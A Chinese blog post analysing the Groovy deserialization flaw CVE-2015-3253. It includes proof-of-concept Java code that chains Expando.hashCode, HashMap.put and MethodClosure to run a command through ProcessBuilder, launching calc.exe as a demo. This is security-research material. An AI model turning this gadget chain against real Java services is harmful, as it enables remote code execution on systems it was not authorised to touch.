Groovy 反序列化漏洞分析(CVE-2015-3253)

最新推荐文章于 2024-01-12 11:01:25 发布
最新推荐文章于 2024-01-12 11:01:25 发布
阅读量679 收藏
点赞数
文章标签: java 开发工具 runtime
原文链接:http://www.cnblogs.com/magic-zero/p/9755413.html
版权

0x00 前言

  Java反序列化的漏洞爆发很久了,此前一直想学习一下。无奈Java体系太过于复杂,单是了解就花了我很久的时间,再加上懒,就一直拖着,今天恰好有空,参考@iswin大佬两年前的分析,我自己跟踪了一下流程,并按自己的想法重写了一下POC,在此做个记录。

0x01 漏洞环境搭建

  首先我们需要明确的是,该漏洞影响的范围是Groovy 1.7.0-2.4.3。我们借助于Idea构建一个空白的maven项目,然后配置pom.xml文件,添加如下依赖:

 

    <dependencies>
        <dependency>
            <groupId>org.codehaus.groovy</groupId>
            <artifactId>groovy</artifactId>
            <version>2.4.1</version>
        </dependency>
    </dependencies>

 

等Idea帮我们导入所需要的依赖库以后,我们就可以开始分析了。

0x02 不安全的对象方法调用

  在搭建好漏洞环境之后我们定位到漏洞现场,在 org.codehaus.groovy.runtime.MethodClosure 类中存在如下代码:

    protected Object doCall(Object arguments) {
        return InvokerHelper.invokeMethod(this.getOwner(), this.method, arguments);
    }

熟悉Java反射机制的话应该不难猜出doCall方法动态调用了指定对象的指定方法,而实际上该类的描述也恰好证实了这一点。我们继续跟进invokeMethod方法,org.codehaus.groovy.runtime.invokeHelper类:

 

    public static Object invokeMethod(Object object, String methodName, Object arguments) {
        if (object == null) {
            object = NullObject.getNullObject();
        }

        if (object instanceof Class) {
            Class theClass = (Class)object;
            MetaClass metaClass = metaRegistry.getMetaClass(theClass);
            return metaClass.invokeStaticMethod(object, methodName, asArray(arguments));
        } else {
            return !(object instanceof GroovyObject) ? invokePojoMethod(object, methodName, arguments) : invokePogoMethod(object, methodName, arguments);
        }
    }

 

从方法的参数表中我们可以看出,第一个参数为调用方法的对象,第二个参数为被调用执行的方法,第三个参数的含义为该方法的所需要的参数。

此时我写了一个测试代码如下:

MethodClosure mc = null;
try {
    mc = new MethodClosure((new ProcessBuilder("C:/windows/system32/cmd.exe", "/c", "C:/windows/system32/calc.exe")), "start");
 } catch (IOException e) { e.printStackTrace(); } mc.call();

运行后:

0x03 寻找利用链

  我们此时已经找到能够触发漏洞的点,接下来需要考虑的问题是,寻找调用call方法的地方,实现漏洞的利用。之所以要寻找调用call方法的地方是因为call方法调用了这里的doCall去执行指定对象的指定方法。通过Idea我们发现:

public int hashCode() {
    Object method = this.getProperties().get("hashCode");
    if (method != null && method instanceof Closure) {
        Closure closure = (Closure)method;
        closure.setDelegate(this);
        Integer ret = (Integer)closure.call();
        return ret;
    } else {
        return super.hashCode();
    }
}

在Expando类hashCode方法中调用了call方法,这样我们只需要想办法调用hashCode方法即可调用其call方法。此时我们需要注意,Java中hashCode方法默认会返回该对象在JVM中的内存地址。当比较两个对象是否相等的时候,会调用该对象的hashCode以及equals方法进行比较,如果两个方法返回结果一致,那么比较的结果将返回真。否则,将返回假。

明白了hashCode方法以后,我们再来说说HashMap的put方法。HashMap是Java中的一种k-v数据结构,不允许存在相同的key。所以在put时候是会对key进行比对判断是否会重复的。此时如果我们可以控制key为恶意的对象,那么将会通过hashCode方法执行call方法,从而执行精心构造的代码。

当然在Expando中我们同样发现了toString方法存在调用call方法的代码,但是这里我们先重点关注hashCode方法。

0x04 构造利用代码

  经过以上分析, 我们首先构造Expando对象,并通过其setProperty方法设置属性值的键为hashCode,值为我们的恶意对象。代码如下:

 

Expando ep = new Expando();

ep.setProperty("hashCode", evilObj);

然后通过调用HashMap对象的put方法触发这里恶意对象。

HashMap<Expando, Integer> hashMap = new HashMap<Expando, Integer>();

hashMap.put(ep, 1);

然后这里的evilObj就很容易了,

MethodClosure evilObj = new MethodClosure((new ProcessBuilder("C:/windows/system32/cmd.exe", "/c", "C:/windows/system32/calc.exe")), "start");

全部代码如下:

// 创建恶意对象
Expando ep = new Expando();

MethodClosure evilObj = new MethodClosure((new ProcessBuilder("C:/windows/system32/cmd.exe", "/c", "C:/windows/system32/calc.exe")), "start");
// 将恶意Closure对象绑定到Expando对象 
ep.setProperty("hashCode", evilObj); 

HashMap<Expando, Integer> hashMap = new HashMap<Expando, Integer>(); 

// 调用put方法从而调用HashCode方法 
hashMap.put(ep, 1);

单步跟踪到hashCode方法的时候执行:

 

转载于:https://www.cnblogs.com/magic-zero/p/9755413.html

weixin_30519071
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析
08-08
XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析1
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
【序列化】UNSAFE_DESERIALIZATION 不安全的反序列化反序列化漏洞
m0_45406092的博客
08-21 6327
Unsafe Deserialization 进行代码检查时,Coverity工具在进行json转换时,报Unsafe Deserialization错误,字面意思是不安全的反序列化,根本原因就是反序列化会有漏洞导致的。 看完下文反序列化漏洞的原理后,我们就知道该如何解决这个问题了。 反序列化漏洞 ...
wuyun知识库目录
Grey的博客
01-15 7120
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
Groovy】json 字符串反序列化 ( 使用 JsonSlurper 进行 json 字符串反序列化 | 根据 map 集合构造相关类 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
02-09 4900
一、使用 JsonSlurper 进行 json 字符串反序列化、 二、根据 map 集合构造相关类、 三、完整代码示例、
Xstream Deserializable Vulnerablity And GroovyCVE-2015-3253
weixin_33885676的博客
03-08 115
xcoder · 2016/03/02 10:380x00 简介序列化的问题貌似在最近爆发的非常频繁,最近有小伙伴在问我关于这两天爆发的Xstream组建的反序列化漏洞,最近公司非常忙,不过赶上周末刚好抽时间看了下,其实这次的漏洞和之前JRE的那个反序列化漏洞触发的条件基本上差不多,不过关于JRE的那个序列化似乎没人关注,有兴趣的同学可以去找找关于那个JRE的序列化,影响力不亚于11月份我分析的...
java 反序列化(1):Groovy
qq_38641816的博客
03-24 253
1,完整利用代码如下: public class groovtest { static String command = "calc"; public static void main(String[] args){ // write object try{ //封装我们需要执行的对象 MethodClosure methodClosure = new MethodClosure(command,"execut
由浅入深的了解Groovy的基本使用
qq_47291265的博客
04-06 6734
0、安装Groovy 1、解压并配置环境变量 GROOVY_HOME=F:\project\Groovy 2、输入groovy -v查看版本信息 1、了解前提 1.1、什么是GroovyGroovy是机遇Java虚拟机的一种敏捷的动态语言,它是一种成熟的OOP(面向对象)编程语言,既可以用于面向对象编程,又可以用作纯粹的脚本语言。使用该种语言不必编写过多的代码,同时又具有闭包和动态语言的其他特性。 1.2、于Java相比,Groovy的不同点或优势 1、Groovy完全兼容Java语法,可以做脚本也
ElasticSearch Groovy脚本远程代码执行漏洞分析CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1066
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467)复现
最新发布
fly夏天的博客
01-12 502
Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467)复现
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的...
CVE-2020-9484
04-13
CVE-2020-9484(Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。跑步$ git clone https://github.com/masahiro331/CVE-2020-9484.git$ cd CVE-2020-9484$ docker build -t tomcat:groovy .$ docker run -d -p...
groovy-all-2.4.13-API文档-中文版.zip
04-23
赠送jar包:groovy-all-2.4.13.jar; 赠送原API文档:groovy-all-2.4.13-javadoc.jar; 赠送源代码:groovy-all-2.4.13-sources.jar; 赠送Maven依赖信息文件:groovy-all-2.4.13.pom; 包含翻译后的API文档:groovy...
groovy-language-server:Groovy的语言服务器
03-20
当前支持以下语言服务器协议请求:完成定义documentSymbol徘徊参考改名签名帮助象征typeDefinition建造要从命令行进行构建,请运行以下命令: ./gradlew build这将创建build / libs / groovy-language-server-all....
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427)
黑白的博客
12-13 639
声明 好好学习,天天向上 漏洞描述 和3210的漏洞很像,也是恶意代码执行漏洞,3210是执行任意MVEL表达式和java代码,3210之后MVEL表达式被弃用,ES的动态脚本语言换成了Groovy(而且增加了sandbox),然额换成Groovy之后仍然存在恶意代码执行漏洞 影响范围 Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 复现过程 这里使用v1.4.2版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-
review代码从哪些角度_代码审计-dubbo admin <=2.6.1远程命令执行漏洞
weixin_34981046的博客
01-02 378
目录前置输入材料安全目标和需求架构分析供应链安全源代码审查依赖结构矩阵(Dependency Structure Matrices,DSM)数据流信任边界数据存贮威胁列表otter managerdubbo admin修复方案RoadMap 通过结构化的思维进行以软件程序为中心的威胁建模、枚举威胁、缓解威胁、验证来解决四个问题:具体业务是什么?哪些地方可能出现风险?如何规避解决?是否覆盖完整...
java--Groovy1学习
zyer
06-14 792
java反序列化学习--Groovy1
CVE-2019-10247漏洞处理
03-29
CVE-2019-10247是一个在Jenkins中的安全漏洞,该漏洞存在于Pipeline: Groovy Plugin中,攻击者可以利用该漏洞执行未授权的Groovy脚本。 以下是处理CVE-2019-10247漏洞的步骤: 1. 首先,您需要确认您的Jenkins版本是否受到该漏洞的影响。该漏洞影响Jenkins Pipeline: Groovy Plugin的所有版本。您可以通过访问Jenkins漏洞数据库来查看所有受影响的版本。 2. 如果您的版本受到影响,则需要立即升级到最新版本。Jenkins已发布了一个修复程序,您可以通过访问Jenkins官方网站来下载最新版本。 3. 如果您无法立即升级,您可以使用插件管理器来禁用Pipeline: Groovy Plugin插件。这将防止攻击者利用该漏洞。 4. 另外,您还可以实施其他安全措施,例如限制Jenkins的访问权限、执行最小特权原则、使用双因素身份验证等。 总之,处理CVE-2019-10247漏洞需要立即采取措施,以防止攻击者利用该漏洞对您的系统进行攻击和入侵。升级到最新版本或禁用插件是最有效的措施之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值